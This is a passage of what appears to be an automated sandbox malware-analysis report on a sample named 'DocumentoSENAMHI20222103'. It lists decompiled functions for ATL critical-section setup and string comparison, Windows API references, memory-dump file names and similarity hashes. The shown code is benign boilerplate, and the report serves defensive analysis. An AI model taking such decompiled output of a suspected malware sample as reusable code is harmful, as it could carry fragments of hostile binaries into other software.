    • Instruction Fuzzy Hash: 03119833F00115E7CB16AAA49C427BF72655F55712F144016FE21BF282EB749D49C7D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00153F8E(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E00153FE1(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0x150000;
    				 *((intOrPtr*)(__ecx + 4)) = 0x150000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0x1612e0;
    				if(E001510C5(0x150000, __ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0x292df9 = 1;
    				}
    				return _t13;
    			}

    APIs
      • Part of subcall function 001510C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00167488), ref: 001510CB
      • Part of subcall function 001510C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00167488), ref: 001510D5
    • IsDebuggerPresent.KERNEL32(?,?,?,0015106D), ref: 00153FC1
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0015106D), ref: 00153FD0
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00153FCB
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599
    • Opcode ID: dff3aed3336237b7f871626ec8d47dbe5ad1e17235fc4cade26cda091cb100dd
    • Instruction ID: 642b6e6812108e66718d5003568e26d9d89b63684be8a334384ba90724015629
    • Opcode Fuzzy Hash: dff3aed3336237b7f871626ec8d47dbe5ad1e17235fc4cade26cda091cb100dd
    • Instruction Fuzzy Hash: 65E03970600310DBD3209F69E9187827AE0AB14785F14881EE872DB680EBB095888BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E001521F6(CHAR* __ecx, short* __edx) {
    				CHAR* _t12;
    				short* _t13;
    
    				_t12 = __ecx;
    				_t13 = __edx;
    				if(lstrcmpiA(__ecx, 0x165ebc) != 0) {
    					if(lstrcmpiA(_t12, 0x165ec0) != 0) {
    						if(lstrcmpiA(_t12, 0x165ec4) != 0) {
    							if(lstrcmpiA(_t12, 0x165ec8) != 0) {
    								 *_t13 = 0;
    								return 0;
    							}
    							_push(0x11);
    							L2:
    							_pop(0x4008);
    							L3:
    							 *_t13 = 0x4008;
    							return 1;
    						}
    						_push(0x13);
    						goto L2;
    					}
    					goto L3;
    				}
    				_push(8);
    				goto L2;
    			}






    APIs
    • lstrcmpiA.KERNEL32(?,00165EBC,?,00000000,00000000,001524CA,?,26A91022,?,00000000,?,?,?,0016088D,000000FF), ref: 00152209
    • lstrcmpiA.KERNEL32(?,00165EC0,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152220
    • lstrcmpiA.KERNEL32(?,00165EC4,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152233
    • lstrcmpiA.KERNEL32(?,00165EC8,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152243
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: lstrcmpi
    • String ID:
    • API String ID: 1586166983-0
    • Opcode ID: ec3eb18404b68a7219ced943fc283f1b49e8b6264f9ee3a278fe10497b866179
    • Instruction ID: 068269c2becc0419dc6d6cf7fd524b8c7a34504036d9ece53309dc31aa99755d
    • Opcode Fuzzy Hash: ec3eb18404b68a7219ced943fc283f1b49e8b6264f9ee3a278fe10497b866179
    • Instruction Fuzzy Hash: 36F0823F384703F2D72411695C81F3B41995FA7B53F21403AFE65EA080E7B1CC492225
    Uniqueness

    Uniqueness Score: -1.00%